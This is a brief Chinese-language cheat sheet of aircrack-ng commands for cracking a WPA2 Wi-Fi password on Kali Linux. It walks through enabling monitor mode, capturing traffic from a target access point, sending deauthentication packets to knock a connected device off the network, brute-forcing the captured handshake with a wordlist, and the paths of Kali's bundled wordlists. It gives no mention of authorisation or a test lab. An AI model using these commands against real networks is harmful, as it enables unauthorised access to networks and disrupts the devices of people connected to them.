1. 查看网卡状态
$iwconfig
2. 开启监听模式
$airmon-ng start wlan0
3. 确认已开启监听模式
$iwconfig
4. 进入监听模式
$airodump wlan0mon
5. 选择监听ssid
$airodump wlan0mon --bssid 00:00:00:00:00:00 -c 信道号码 -w wpa2
6. 攻击连入设备
$aireplay -0 2 -a 路由mac -c 设备mac wlan0mon
7. 破解握手包
$aircrack-ng -w 字典路径 握手包文件
8. kali自带字典
/usr/share/john/password.lst
/usr/share/wfuzz/wordlist
/usr/share/wordlists/rockyou.txt